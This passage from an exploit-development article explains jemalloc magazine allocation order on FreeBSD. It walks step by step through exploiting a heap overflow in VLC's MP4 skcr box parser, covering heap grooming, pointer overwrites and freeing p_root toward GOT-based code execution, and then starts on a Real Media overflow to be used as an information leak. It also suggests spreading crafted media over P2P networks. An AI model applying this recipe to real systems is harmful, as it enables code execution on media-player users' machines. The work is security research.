initialized to 'NULL' since it's also declared as 'static'. Access to
|
|
thread local memory is transparent to the user; each time 'mag_rack'
|
|
is referenced, the runtime automatically figures out where the thread's
|
|
private memory can be found.
|
|
|
|
It's now easier to understand how 'arena_malloc()' will act once
|
|
'__isthreaded' and 'opt_mag' are set to true. First the existing
|
|
'magazine rack' pointer is checked; if NULL, 'mag_rack_create()' will
|
|
be called to (a) initialize the 'mag_rack_t' structure and (b) populate
|
|
it with preallocated memory regions for the bin that corresponds to the
|
|
requested size (notice that magazine racks are only used for bin-sized
|
|
allocations; larger ones follow another code path).
|
|
|
|
Assume a random thread in a random application calls 'malloc(4)'. The
|
|
instruction pointer will soon reach a call to 'mag_rack_alloc(mag_rack,
|
|
4, false);'.
|
|
|
|
|
|
static inline void *
|
|
mag_rack_alloc(mag_rack_t *rack, size_t size, bool zero)
|
|
{
|
|
void *ret;
|
|
bin_mags_t *bin_mags;
|
|
mag_t *mag;
|
|
size_t binind;
|
|
|
|
binind = size2bin[size]; /* (1) */
|
|
...
|
|
|
|
bin_mags = &rack->bin_mags[binind]; /* (2) */
|
|
|
|
mag = bin_mags->curmag; /* (3) */
|
|
if (mag == NULL) {
|
|
/* Create an initial magazine for this size class. */
|
|
|
|
mag = mag_create(choose_arena(), binind);
|
|
|
|
bin_mags->curmag = mag;
|
|
mag_load(mag);
|
|
}
|
|
|
|
ret = mag_alloc(mag);
|
|
...
|
|
|
|
return (ret);
|
|
}
|
|
|
|
|
|
The input size is converted to a bin index (1), for a size of 4,
|
|
'binind' will be set to 0. Each magazine rack has its own set of bins
|
|
which are private to the thread (2). Variable 'mag' is set to point to
|
|
the rack's 'magazine' for this specific bin size (3). A 'magazine' is a
|
|
simple array of void pointers, called 'rounds[]', that holds addresses
|
|
of preallocated memory regions of equal size. Function 'mag_load()' is
|
|
called to initialize it. Here's where things start to get more interesting
|
|
and may influence the exploitation process in a significant way. Skimming
|
|
through 'mag_load()' reveals the following:
|
|
|
|
|
|
static void
|
|
mag_load(mag_t *mag)
|
|
{
|
|
...
|
|
arena = choose_arena(); /* (1) */
|
|
bin = &arena->bins[mag->binind];
|
|
|
|
for (i = mag->nrounds; i < max_rounds; i++) {
|
|
...
|
|
|
|
round = arena_bin_malloc_easy(arena, bin, run); /* (2) */
|
|
...
|
|
|
|
mag->rounds[i] = round;
|
|
}
|
|
...
|
|
|
|
mag->nrounds = i;
|
|
...
|
|
}
|
|
|
|
|
|
Depending on the build configuration, 'choose_arena()' (1) may statically
|
|
assign a thread to the same arena or dynamically to a different one
|
|
every time it gets called. No matter what the assignment process looks
|
|
like, we can see that at (2), the 'rounds[]' array is populated by a
|
|
normal call to 'arena_bin_malloc_easy()' (or 'arena_bin_malloc_hard()');
|
|
the function that a process would call had it not been threaded. Since
|
|
the heap internals work in a purely deterministic way (for now ignore
|
|
the inherent non-determinism regarding thread scheduling), we can be
|
|
quite sure that the regions whose addresses are stored in 'rounds[]'
|
|
will probably be contiguous. Assuming no holes are found in the heap
|
|
(which is easy to assume since an experienced exploit developer knows
|
|
how to fill them), the regions returned by 'arena_bin_malloc_xxx()'
|
|
will be in increasing memory addresses as shown in the following figure.
|
|
|
|
|
|
Run (PAGE_SIZE) that services 4byte allocations
|
|
.-------.-------.-----.-------.
|
|
0xdeadb000 | reg 1 | reg 2 | ... | reg N |
|
|
'-------'-------'-----'-------'
|
|
^ ^ ^
|
|
| .-' '--.
|
|
| | |
|
|
.-----.-----.-----.-----.
|
|
| 0 | 1 | ... | M |
|
|
'-----'-----'-----'-----'
|
|
rounds[] array
|
|
|
|
|
|
Once initialization is complete, we return back to 'mag_rack_alloc()'
|
|
that calls 'mag_alloc()' to pick an entry in the 'rounds[]' array to
|
|
give to the user.
|
|
|
|
|
|
mag_alloc(mag_t *mag) {
|
|
if (mag->nrounds == 0)
|
|
return (NULL);
|
|
|
|
mag->nrounds--; /* (1) */
|
|
|
|
return (mag->rounds[mag->nrounds]); /* (2) */
|
|
}
|
|
|
|
|
|
If this is the first allocation taking place in the thread, 'mag_alloc()'
|
|
will return the last element of the 'rounds[]' array. The 'malloc(4)'
|
|
calls that may follow will be served by the exact same magazine with
|
|
regions in decreasing memory addresses! That is, magazines are populated
|
|
in a 'forward' fashion but consumed in 'backward' one so that if you
|
|
allocate, for example, 3 regions, their memory order will be 321 instead
|
|
of 123 :)
|
|
|
|
|
|
----[ 2.2 - Your reversed heap reversed again
|
|
|
|
As explained in our main jemalloc article, '__isthreaded' is set to true
|
|
after a successful call to 'pthread_create()' (in fact, it is enabled by
|
|
libthr) and remains as such until the end of the program's lifetime, that
|
|
is, joining the threads will not set '__isthreaded' to 0. Consequently,
|
|
once the magazine racks have been initialized, jemalloc will keep using
|
|
them no matter what the number of active threads is.
|
|
|
|
As explained in the previous section, continuous allocations serviced by
|
|
magazines, may return memory regions in decreasing memory addresses. We
|
|
keep using the word 'may' because this is not always the case. Consider
|
|
the following code snippet which we advise that you read carefully:
|
|
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <pthread.h>
|
|
#include <unistd.h>
|
|
|
|
extern int __isthreaded;
|
|
void *allocs[10];
|
|
|
|
void start_allocs(void) {
|
|
int i;
|
|
printf("Allocating regions\n");
|
|
for(i = 0; i < 10; i++) {
|
|
allocs[i] = malloc(192);
|
|
printf("%p\n", allocs[i]);
|
|
}
|
|
return;
|
|
}
|
|
|
|
void free_allocs(void) {
|
|
int i;
|
|
printf("Freeing the regions\n");
|
|
for(i = 0; i < 10; i++)
|
|
free(allocs[i]);
|
|
return;
|
|
}
|
|
|
|
void free_allocs_rev(void) {
|
|
int i;
|
|
printf("Freeing the regions in reverse order\n");
|
|
for(i = 10 - 1; i >= 0; i--)
|
|
free(allocs[i]);
|
|
return;
|
|
}
|
|
|
|
void *thread_runner(void *p) {
|
|
int rev = *(int *)p;
|
|
|
|
sleep(1);
|
|
|
|
if(rev)
|
|
free_allocs_rev();
|
|
else
|
|
free_allocs();
|
|
|
|
start_allocs();
|
|
return NULL;
|
|
}
|
|
|
|
int main(int argc, char *argv[]) {
|
|
pthread_t tid;
|
|
int rev = 0;
|
|
|
|
if(argc > 1)
|
|
rev = atoi(argv[1]);
|
|
|
|
start_allocs();
|
|
pthread_create(&tid, NULL, thread_runner, (void *)&rev);
|
|
pthread_join(tid, NULL);
|
|
return 0;
|
|
}
|
|
|
|
|
|
There are three important functions in the code above; 'start_allocs()'
|
|
which allocates 10 memory regions that will be serviced by bin-192,
|
|
'free_allocs()' that frees the aforementioned regions in a 'forward'
|
|
fashion and 'free_allocs_rev()' that will do the same thing but in reverse
|
|
order. The 'allocs[]' array holds pointers to allocated regions. On
|
|
startup, 'main()' will call 'start_allocs()' to populate 'allocs[]'
|
|
and then will fire up a thread that will free those regions. Carefully
|
|
looking at jemalloc's code, reveals that even on deallocation, a new
|
|
magazine rack will be allocated and the regions being freed will be
|
|
eventually inserted in the thread's magazine for that specific size class!
|
|
You can think of that as the memory regions changing ownership; regions
|
|
belonging to the main thread, become property of the new thread started by
|
|
'pthread_create()'.
|
|
|
|
Once the new thread calls 'start_allocs()', the exact same regions that
|
|
were previously freed will be eventually be returned to the caller. The
|
|
order by which they will be returned, depends on the way they were freed
|
|
in the first place. Let's run our test program above by passing it the
|
|
value 0 in 'argv[1]'; this will ask the thread to free the regions in
|
|
the normal way.
|
|
|
|
|
|
[hk@lsd ~]$ ./test 0
|
|
Allocating regions
|
|
0x282070c0
|
|
0x28207180
|
|
0x28207240
|
|
0x28207300
|
|
0x282073c0
|
|
0x28207480
|
|
0x28207540
|
|
0x28207600
|
|
0x282076c0
|
|
0x28207780
|
|
Freeing the regions
|
|
Allocating regions
|
|
0x28207780
|
|
0x282076c0
|
|
0x28207600
|
|
0x28207540
|
|
0x28207480
|
|
0x282073c0
|
|
0x28207300
|
|
0x28207240
|
|
0x28207180
|
|
0x282070c0
|
|
|
|
|
|
As you can see, the calls to 'malloc()' performed by the thread, return
|
|
the regions in reverse order; this is very similar to what the previous
|
|
section explained. Now let's free the regions allocated by 'main()'
|
|
by calling 'free_allocs_rev()':
|
|
|
|
|
|
[hk@lsd ~]$ ./test 1
|
|
Allocating regions
|
|
0x282070c0
|
|
0x28207180
|
|
0x28207240
|
|
0x28207300
|
|
0x282073c0
|
|
0x28207480
|
|
0x28207540
|
|
0x28207600
|
|
0x282076c0
|
|
0x28207780
|
|
Freeing the regions in reverse order
|
|
Allocating regions
|
|
0x282070c0
|
|
0x28207180
|
|
0x28207240
|
|
0x28207300
|
|
0x282073c0
|
|
0x28207480
|
|
0x28207540
|
|
0x28207600
|
|
0x282076c0
|
|
0x28207780
|
|
|
|
|
|
Interestingly, the regions are returned in the same order as they were
|
|
allocated. You can think of that as the 'rounds[]' array in 'mag_load()'
|
|
being reversed; the allocations are freed in the reverse order and
|
|
placed in 'rounds[]' but 'mag_alloc()' gives out regions in reverse
|
|
order too... Reverse + reverse = obverse ;)
|
|
|
|
So why this is important? Regions of a commonly used size (e.g 64), are
|
|
usually allocated by a program before 'pthread_create()' is called. Once a
|
|
thread is created and '__isthreaded' is set to true, freeing those regions
|
|
may result in some thread becoming their master. Future allocations from
|
|
the thread in question, may return regions in the normal way rather than
|
|
in decreasing memory addresses as shown in the previous section. This
|
|
a very important observation that an exploit coder must keep in mind
|
|
while targeting FreeBSD applications or any program utilizing jemalloc.
|
|
|
|
In the sections to follow, we will be dealing with two vulnerabilities;
|
|
one in the MP4 demuxer and one in the RMF parser. The first concerns
|
|
4-byte allocations which are not that common. As a result, VLC which
|
|
is a multithreaded application, will by default return such regions in
|
|
decreasing locations. On the contrary, the RMF vulnerability is related
|
|
to 192-byte regions, which, being larger, are more common. Several 192-byte
|
|
allocations may have been created or destroyed before 'pthread_create()'
|
|
is called and thus we cannot guarantee their re-allocation order. It
|
|
is for this purpose that we have to employ more tricks for the latter
|
|
vulnerability.
|
|
|
|
|
|
----[ 2.3 - Sum up of jemalloc magazine facts
|
|
|
|
To sum up:
|
|
|
|
1 - While in glibc and dlmalloc you were used to seeing new memory
|
|
regions getting allocated in higher addresses, this is not the case with
|
|
jemalloc. If magazines are enabled, continuous allocations may return
|
|
regions in decreasing memory order. It's quite easy for anyone to verify
|
|
by pure observation.
|
|
|
|
2 - Don't get 1 for granted. Depending on the order the allocations were
|
|
performed, even if thread magazines are enabled, memory regions may end
|
|
up being returned in the normal order. This, for example, can happen when
|
|
memory regions that were allocated before the first thread is spawned,
|
|
are eventually freed by one of the threads.
|
|
|
|
3 - Always remember that jemalloc does not make use of meta-information
|
|
embedded within the regions themselves. The fact that there are no
|
|
inline metadata bordering the end user allocations sounds like good
|
|
news. It's both a wise design choice and a powerful primitive in the
|
|
attacker's hands.
|
|
|
|
4 - For i = 0 ... 10 goto 1
|
|
|
|
|
|
--[ 3 - 'MP4_ReadBox_skcr()' heap overflow vulnerability
|
|
|
|
----[ 3.1 - MP4 file format structure
|
|
|
|
The very first vulnerability we will be analyzing is a heap overflow
|
|
within VLC's MP4 demuxer [4]. As stated earlier, VLC's builtin MP4
|
|
demuxer is only used for local files, as opposed to network streams that
|
|
go through an alternate code path, ending up being handled by libffmpeg
|
|
code. Properly parsing a media file is a very cumbersome task involving
|
|
complex sanity checks. File format parsers and especially those related
|
|
to media files have been the root cause of many vulnerabilities in the
|
|
past (remember all that 'RIAA employing Gobbles to pwn media players' [3]
|
|
bullshit?). We are definitely not experts when it comes to multimedia
|
|
formats; we will only take a look at how an MP4 file is structured, no
|
|
details will be given on signal processing and encoding/decoding stuff,
|
|
since the actual vulnerability is by no means related to the mathematics
|
|
involved in the MP4 specifications (we imagine that there are juicy bugs
|
|
there too ;)
|
|
|
|
Briefly, an MP4 file looks like a tree of nodes serialized in a depth
|
|
first order with the root node coming first (people that have experience
|
|
with DWARF will probably notice the similarities). Tree nodes are split
|
|
in two categories: containers and leaf nodes, also known as 'boxes',
|
|
with the later holding the media information (both data and metadata) and
|
|
the first playing the role of logically connecting its children. There
|
|
are several types of boxes (frma, skcr, dref, url, urn, etc.) as well as
|
|
several types of containers (ftyp, udta, moov, wave, etc.).
|
|
|
|
Easter egg: We believe URLs embedded withing MP4 meta-information,
|
|
which are normally used to fetch artist names, cover artwork and so on,
|
|
may also be used for performing web attacks. Let us know if you have
|
|
experience on this ;) Dear Anonymous, did you know that sharing such
|
|
media files in P2P networks may be used for more uniformly distributed
|
|
attacks?
|
|
|
|
Each tree node, weather a container or a box, is represented by a
|
|
structure called 'MP4_Box_t' defined in modules/demux/mp4/libmp4.h:970:
|
|
|
|
|
|
typedef struct MP4_Box_s {
|
|
off_t i_pos; /* Offset of node in the file */
|
|
uint32_t i_type; /* Node type */
|
|
...
|
|
uint64_t i_size; /* Size of data including headers etc */
|
|
MP4_Box_data_t data; /* A union of pointers; depends on 'i_type' */
|
|
|
|
/* Tree related pointers */
|
|
struct MP4_Box_s *p_father;
|
|
struct MP4_Box_s *p_first;
|
|
struct MP4_Box_s *p_last;
|
|
struct MP4_Box_s *p_next;
|
|
} MP4_Box_t;
|
|
|
|
|
|
The vulnerability lies in the function responsible for parsing boxes of
|
|
type 'skcr'.
|
|
|
|
|
|
----[ 3.2 - Vulnerability details
|
|
|
|
For each box type, a dispatch table is used to call the appropriate
|
|
function that handles its contents. For 'skcr' boxes, 'MP4_ReadBox_skcr()'
|
|
is responsible for doing the dirty work.
|
|
|
|
|
|
/* modules/demux/mp4/libmp4.c:2248 */
|
|
static int MP4_ReadBox_skcr(..., MP4_Box_t *p_box) {
|
|
MP4_READBOX_ENTER(MP4_Box_data_frma_t);
|
|
|
|
MP4_GET4BYTES(p_box->data.p_skcr->i_init);
|
|
MP4_GET4BYTES(p_box->data.p_skcr->i_encr);
|
|
MP4_GET4BYTES(p_box->data.p_skcr->i_decr);
|
|
|
|
...
|
|
}
|
|
|
|
|
|
'MP4_READBOX_ENTER()' is a macro that, among other things, will allocate a
|
|
structure of the given type and store it in 'p_box->data.p_data'. Macro
|
|
'MP4_GET4BYTES()' will just read 4 bytes off the input stream and store
|
|
it in the region pointed by the argument. While messing with the VLC
|
|
internals, it's good to keep in mind that integers in MP4 files (as well
|
|
as other media types) are in big endian order.
|
|
|
|
The vulnerability is kind of obvious; instead of allocating a
|
|
'MP4_Box_data_skcr_t' structure, 'MP4_ReadBox_skcr()' allocates
|
|
an 'MP4_Box_data_frma_t', but later on, the pointer is assumed to
|
|
point to a struct of the first type (notice how 'MP4_GET4BYTES()' is
|
|
used; the 'data' union of the 'MP4_Box_t' is assumed to point to the
|
|
correct structure). 'MP4_Box_data_frma_t', on x86, is 4 bytes long but
|
|
'MP4_ReadBox_skcr()' will treat it as having a size of 12 bytes (the
|
|
real size of 'MP4_Box_data_skcr_t'), resulting in 8 bytes being written
|
|
off the heap region boundaries.
|
|
|
|
|
|
----[ 3.3 - Old is gold; 'unlink()' style ftw
|
|
|
|
The very first thing to note is the size of the victim structure (the
|
|
one being overflown). 'MP4_Box_data_frma_t' has a size of 4 bytes, so,
|
|
it is handled by jemalloc's bin for this specific size class (depending on
|
|
the variant, 4 may or may not be the smallest bin size). As a consequence,
|
|
the 8 bytes written outside its bounds can only influence neighboring
|
|
allocations of equal size, namely 4. Exploit developers know that the
|
|
heap has to be specially prepared before triggering an overflow. For
|
|
this specific vulnerability, the attacker has to force VLC place
|
|
4-byte allocations of interest next to the victim structure. Looking
|
|
carefully in libmp4.h, reveals the following two box types which seem
|
|
to be interesting:
|
|
|
|
|
|
typedef struct {
|
|
char *psz_text;
|
|
} MP4_Box_data_0xa9xxx_t;
|
|
|
|
...
|
|
|
|
typedef struct MP4_Box_data_cmov_s {
|
|
struct MP4_Box_s *p_moov;
|
|
} MP4_Box_data_cmov_t;
|
|
|
|
|
|
Obviously, both structures are 4 bytes long and thus good target
|
|
candidates. 'MP4_Box_data_0xa9xxx_t' holds a pointer to a string we
|
|
control, and 'MP4_Box_data_cmov_t' a pointer to some 'MP4_Box_t' whose
|
|
type and contents may be partially influenced by the attacker. Let's focus
|
|
on the 'cmov' box first and why that 'p_moov' pointer is interesting. What
|
|
can we do if we eventually manage to place a 'cmov' box next to the victim
|
|
'frma' structure?
|
|
|
|
|
|
/* modules/demux/mp4/libmp4.c:2882 */
|
|
MP4_Box_t *MP4_BoxGetRoot(...) {
|
|
...
|
|
|
|
/* If parsing is successful... */
|
|
if(i_result) {
|
|
MP4_Box_t *p_moov;
|
|
MP4_Box_t *p_cmov;
|
|
|
|
/* Check if there is a cmov... */
|
|
if(((p_moov = MP4_BoxGet(p_root, "moov")) &&
|
|
(p_cmov = MP4_BoxGet(p_root, "moov/cmov"))) ||
|
|
((p_moov = MP4_BoxGet(p_root, "foov")) &&
|
|
(p_cmov = MP4_BoxGet(p_root, "foov/cmov")))) {
|
|
|
|
...
|
|
p_moov = p_cmov->data.p_cmov->p_moov; /* (1) */
|
|
...
|
|
p_moov->p_father = p_root; /* (2) */
|
|
...
|
|
}
|
|
}
|
|
|
|
return p_root;
|
|
}
|
|
|
|
|
|
'MP4_BoxGetRoot()' is the entry point of VLC's MP4 file parser. The
|
|
first 'if' block is entered when parsing has finished and everything
|
|
has gone smoothly; only fatal errors are taken into account. Certain
|
|
erroneous conditions are gracefully handled by aborting the parsing
|
|
process of the current tree node and continuing to the parent. The
|
|
second 'if' block looks up the 'cmov' box and, if one is found, VLC
|
|
will store the 'p_cmov->p_moov' in a local variable called 'p_moov'
|
|
(1). If we manage to overwrite the 'cmov' structure, then the value of
|
|
'p_moov' may arbitrarily be set by us. Then, at (2), an 'unlink()' style
|
|
pointer exchange takes place which will allow us to write the 'p_root'
|
|
pointer on a memory region of our choice.
|
|
|
|
But wait a minute... We control the address that 'p_root' is written
|
|
to, not 'p_root' nor the contents of the memory it points to. We need
|
|
to figure out a way of affecting the data at the location pointed to by
|
|
'p_root'. If we get to do that, then writing 'p_root' in a properly
|
|
selected .got entry may result in code execution.
|
|
|
|
For now, let's forget about 'p_root' and find a way of overwriting the
|
|
'p_moov' field of a 'cmov' box. First we need to perform several 4-byte
|
|
allocations to stabilize the heap and make sure that the 8 bytes to
|
|
be written to the adjacent regions will not end up in neighboring
|
|
run/chunk metadata. Such a situation may cause a segmentation fault on
|
|
the next call to 'malloc()'; that's something we would definitely like
|
|
to avoid. The tool for performing user controlled allocations is called
|
|
'MP4_ReadBox_0xa9xxx()', the function responsible for parsing boxes of
|
|
type 'MP4_Box_data_0xa9xxx_t'. A careful look at its code reveals that
|
|
we can allocate a string of any size we please; 'AAA\0' is exactly what
|
|
we need right now ;)
|
|
|
|
Now recall that in certain cases, when the target application is
|
|
threaded and has 'opt_mag' enabled, jemalloc will return memory regions
|
|
in descending memory addresses which is the case with VLC during the
|
|
MP4 parsing process. Extra threads are created and used to pre-process
|
|
the files, download album artwork and so on. What we really need to do
|
|
is force the heap to be shaped as shown below:
|
|
|
|
|
|
...[SKCR][JUNK][CMOV][AAA\0][AAA\0][AAA\0]...[AAA\0]...
|
|
- +
|
|
|
|
|
|
'JUNK' stands for a 1-byte allocation caused by a call to 'strdup("")'
|
|
right after 'cmov' is created. The 1-byte allocation ends up being serviced
|
|
by bin-4 since 4 is the minimum allocation granularity for the jemalloc
|
|
variant used in FreeBSD-8.2-RELEASE. The heap layout depicted above is
|
|
pretty straightforward to achieve; the attacker just creates a container
|
|
that holds several '0xa9xxx' boxes followed by 'cmov' and then an 'skcr'
|
|
that will overwrite the 'JUNK' and the 'p_moov' field of the 'cmov'
|
|
neighbor. The multithreading nature of VLC will result in the boxes
|
|
being allocated in reverse order, exactly as shown above.
|
|
|
|
We have successfully managed to overwrite the 'p_moov' pointer that acts
|
|
as the destination address in the 'unlink()' style pointer exchange. The
|
|
question of how we can control 'p_root' still remains unanswered.
|
|
|
|
|
|
----[ 3.4 - Controlling 'p_root' data
|
|
|
|
Long nights of auditing VLC revealed that there's no easy way for us to
|
|
control the memory contents pointed by 'p_root'. Although we had began
|
|
feeling lost, we came up with a very daring idea that, although dangerous
|
|
at first hearing, we were quite confident that would eventually work
|
|
fine: Why not somehow 'free()' the 'p_root' region? Releasing 'p_root'
|
|
memory and performing several 64-byte (= sizeof(MP4_Box_t)) allocations
|
|
will force jemalloc give 'p_root' back to us. '0xa9xxx' boxes can be
|
|
used to perform user controlled allocations, so, theoretically are ideal
|
|
for what we need. Suppose 'p_root' is freed, then a series of 'a9xxx'
|
|
boxes that contain 64-byte opcodes will result in 'p_root' eventually
|
|
holding our shellcode payload... Right?
|
|
|
|
Two questions now arise. First, how can one know the address of 'p_root'
|
|
in order to free it? This is a good question, but it's something we will
|
|
be dealing with later. Second, each '0xa9xxx' box results in two 64-byte
|
|
allocations; one for the 'MP4_Box_t' structure to hold the box itself and
|
|
one for the string that will contain our shellcode. How can we guarantee
|
|
that 'p_root' will be given back by jemalloc for the string allocation and
|
|
thus not for the 'MP4_Box_t'? This is where 'chpl' boxes come in handy:
|
|
|
|
|
|
/* modules/demux/mp4/libmp4.c:2413 */
|
|
static int MP4_ReadBox_chpl(..., MP4_Box_t *p_box) {
|
|
MP4_READBOX_ENTER(MP4_Box_data_chpl_t);
|
|
|
|
MP4_GET1BYTE( p_chpl->i_chapter ); /* Chapter count; user controlled */
|
|
|
|
for(i = 0; i < p_chpl->i_chapter; i++) {
|
|
...
|
|
MP4_GET1BYTE( i_len ); /* Name length; user controlled */
|
|
|
|
p_chpl->chapter[i].psz_name = malloc(i_len + 1);
|
|
...
|
|
|
|
/* 'psz_name' contents; user controlled */
|
|
memcpy( p_chpl->chapter[i].psz_name, p_peek, i_copy );
|
|
...
|
|
}
|
|
...
|
|
}
|
|
|
|
|
|
Each 'chpl' box can be used to perform a series of 254 allocations of 64
|
|
bytes thus increasing the possibility that 'p_root' will be returned for
|
|
our data, not for the 'MP4_Box_t' that describes the 'chpl' node (254/255
|
|
versus 1/255; without even taking into account the determinism of heap
|
|
internals).
|
|
|
|
We have successfully located a gadget that will allow us to control
|
|
'p_root' data but only once the latter has been freed. Now recall that
|
|
'a9xxx' boxes are 4 bytes long and can thus be placed right next to the
|
|
victim 'frma' structure. Don't forget that at this specific time frame
|
|
of the execution, bin sized allocations are always serviced by magazine
|
|
racks and thus decreasing addresses are eventually returned to the user.
|
|
|
|
|
|
...[SKCR][A9XXX][A9XXX]...
|
|
- +
|
|
|
|
|
|
Each call to 'MP4_ReadBox_skcr()' will write 8 bytes off the 'skcr'
|
|
boundaries, so, both of the following 'a9xxx' regions will be overflown
|
|
resulting in their 'psz_text' pointer being overwritten with user
|
|
controlled values. If we could somehow force the 'a9xxx' nodes to be
|
|
freed, their 'psz_text' would be passed to 'free()' as well, resulting
|
|
in the release of two heap regions chosen by the attacker. It turns out
|
|
that doing so is not that hard. All we have to do is place those 'skcr'
|
|
and 'a9xxx' boxes within a common container, which will cause a parsing
|
|
error right after the 'skcr' box is parsed. To do that, we abuse a new
|
|
type of MP4 box called 'stts':
|
|
|
|
|
|
/* modules/demux/mp4/libmp4.c:788 */
|
|
static int MP4_ReadBox_stts(..., MP4_Box_t *p_box) {
|
|
|
|
MP4_READBOX_ENTER(MP4_Box_data_stts_t);
|
|
...
|
|
MP4_GET4BYTES(p_box->data.p_stts->i_entry_count);
|
|
|
|
p_box->data.p_stts->i_sample_count =
|
|
calloc(p_box->data.p_stts->i_entry_count, sizeof(uint32_t)); /* (1) */
|
|
...
|
|
|
|
if(p_box->data.p_stts->i_sample_count == NULL ...) {
|
|
MP4_READBOX_EXIT(0);
|
|
}
|
|
...
|
|
}
|
|
|
|
|
|
At (1), 'i_entry_count' is, obviously, user controlled. Forcing it to
|
|
hold a very high value will result in 'calloc()' returning NULL and thus
|
|
'MP4_ReadBox_stts()' returning 0; the value that indicates a parsing
|
|
failure. Adding the corrupted '0xa9xxx' boxes and the 'skcr' victim in
|
|
the same container with an invalid 'stts' box, will result in the first
|
|
being freed when the parsing error is detected and thus the attacker
|
|
chosen heap regions to be freed*. VLC will continue reading the rest of
|
|
the MP4 data as if nothing wrong has happened.
|
|
|
|
Note: It's crucial to understand that we shouldn't trigger a fatal
|
|
parsing error at this point since the unlink-like code will never be
|
|
reached. In fact, the process of doing that is slightly more complicated
|
|
than described in the previous paragraph; it's a minor detail that should
|
|
not be taken into account right now.
|
|
|
|
|
|
----[ 3.5 MP4 exploitation sum up
|
|
|
|
To sum up, for this first part of the exploitation process the attacker
|
|
must perform the following steps:
|
|
|
|
|
|
1 - Overwrite 'p_moov'
|
|
|
|
1a - Allocate several 'a9xxx' boxes that will stabilize the heap
|
|
|
|
1b - Allocate a 'cmov' box
|
|
|
|
1c - Allocate and fill an 'skcr' box. The 'skcr' handling code will
|
|
allocate an 'frma' structure (4 bytes) and write 12 bytes in its region
|
|
thus eventually overwriting 'cmov->p_moov'
|
|
|
|
2 - Free and control 'p_root' contents
|
|
|
|
2a - Create a 'cmov' container
|
|
|
|
2b - Fill it with 2 '0xa9xxx' boxes
|
|
|
|
2c - Add an 'skcr' that will overwrite the adjacent '0xa9xxx' boxes. The
|
|
overwritten values should be the address of 'p_root' and a random 64
|
|
byte allocation in this specific order.
|
|
|
|
2d - Add an invalid 'stts' box that will force the parsing process
|
|
to fail, the 'cmov' and its children (two '0xa9xxx' and one 'skcr')
|
|
to be freed, the 'psz_text' members of 'MP4_Box_data_0xa9xxx_t' to be
|
|
passed to 'free()' and consequently, 'p_root' to be released.
|
|
|
|
2e - Add several 'chpl' boxes. Each one will result in 254 64byte
|
|
allocations with user controlled contents. Pray that jemalloc will give
|
|
'p_root' back to you (most likely).
|
|
|
|
3 - Repeat step 2 as many times as you please to free as many pointers
|
|
as you like (more on this later)
|
|
|
|
4 - Properly pack everything together so that the 'unlink()' code
|
|
is reached.
|
|
|
|
|
|
One problem still remains; How can one know the address of 'p_root' in
|
|
order to pass it to 'free()'? This is were an information leak would
|
|
be useful. We need to find a bug that when properly exploited will
|
|
reveal data of selected memory regions. Additionally, we need to seek
|
|
the mechanisms by which this data will be returned to the attacker. The
|
|
next section of this phile focuses on these two problems and the voodoo
|
|
required to solve them.
|
|
|
|
|
|
--[ 4 - Real Media 'DemuxAudioSipr()' heap overflow vulnerability
|
|
|
|
----[ 4.1 - VLC as a transcoder
|
|
|
|
Apart from a full blown media player, VLC can also work as a
|
|
transcoder. Transcoding is the process of receiving numerous inputs,
|
|
applying certain transformations on the input data and then sending the
|
|
result to a set of outputs. This is, for example, what happens when you
|
|
rip a DVD and convert it to an .avi stored on your hard disk. In its most
|
|
simple use, transcoding may be used to duplicate an input stream to both
|
|
your soundcard as well as an alternate output, for example, an RTP/HTTP
|
|
network stream, so that other users can listen to the music you're
|
|
currently listening; a mechanism invaluable for your favorite pr0n. For
|
|
more information and some neat examples of using VLC in more advanced
|
|
scenarios, you can have a look at the VideoLan wiki and especially at [5].
|
|
|
|
Trying to find a way to leak memory from VLC, we carefully studied several
|
|
examples from the wiki page at [5] and then started feeding VLC with a
|
|
bunch of mysterious options; we even discovered a FreeBSD kernel 0day while
|
|
doing so. After messing with the command line arguments for a couple of
|
|
minutes we settled down to the following:
|
|
|
|
|
|
vlc ass_traffic.mp4 :sout='#std{access=file,mux=raw,dst=dup.mp4}'
|
|
|
|
|
|
This command, which is just a primitive usage of VLC's transcoding
|
|
features, will just copy 'ass_traffic.mp4' to 'dup.mp4' thus duplicating
|
|
the input stream to a standard file. Furthermore, if VLC is running in
|
|
daemon mode, it is possible for the user to specify a different output
|
|
MRL (Media Resource Location) per media file. For example, assume that
|
|
VLC was started using the command line 'VLC --rc-host 127.0.0.1:8080';
|
|
connecting to port 8080 using netcat and issuing the command...
|
|
|
|
|
|
add /tmp/ass_traffic.mp4 :sout=#std{access=file,mux=raw,dst=/tmp/dup.mp4}
|
|
|
|
|
|
...will, obviously, do the exact same thing. If we could discover an
|
|
information leak, transcoding would be the perfect way of actually having
|
|
VLC return leaked data back to us. For example, what if we could force VLC
|
|
treat arbitrary memory addresses as simple sound information? If we manage
|
|
to do that, then with the help of the transcoding features we could ask
|
|
VLC to dump the memory range in question in a standard file in /tmp :)
|
|
|
|
Note: The truth is that we first focused on exploiting a vulnerability
|
|
that we could turn into a memory disclosure and then explored the
|
|
transcoding stuff. We decided to talk about transcoding first so that
|
|
the reader can keep it in mind while studying the RMF vulnerability
|
|
in the sections that follow.
|
|
|
|
In the days that followed we thoroughly analyzed several public
|
|
vulnerabilities. A specific commit diff in VLC's git caught our attention.
|
|
It was a vulnerability regarding the Real Media format parser discovered by
|
|
Hossein Lotfi [6]. Before actually touching the Real Media demuxer, a quick
|
|
look in the media format itself is essential.
|
|
|
|
|
|
----[ 4.2 - RMF? What's that?
|
|
|
|
Source code for the real media demuxer can be found in
|
|
modules/demux/real.c; the code itself is not very complex and can be easily
|
|
analyzed in couple of hours. From what we've understood by studying the
|
|
source, there are two kinds of Real Media files; the Real Audio (.ra)
|
|
files, as well as the Real Media Format (.rmf) files. In fact, the two
|
|
formats are quite similar with the one being a newer version of the other.
|
|
Audio information is split in tracks, usually interleaved, so that a file
|
|
may have several tracks each one encoded using a different audio codec.
|
|
|
|
The vulnerability we will be analyzing can be triggered with a specially
|
|
crafted RMF file that utilizes the Sipr audio codec (see [7] and [8]).
|
|
|
|
The meta-information present in RMF files is split in various chunks;
|
|
simple headers followed by their data. A special chunk, called MDPR
|
|
(MeDia PRoperties) is used to encode information regarding a track in
|
|
the RMF file (each track has its own associated MDPR header); its name,
|
|
its duration, its title as well as the track identifier, a simple 32-bit
|
|
integer.
|
|
|
|
The sound information, the one you hear when playing a file, is split in
|
|
packets, each one carrying the track ID for the track whose data it
|
|
contains (as we have already mentioned, track data may be interleaved, so
|
|
the file parser has to know what packet belongs to what track). The sipr
|
|
codec goes further by allowing a packet to contain subpackets. When a
|
|
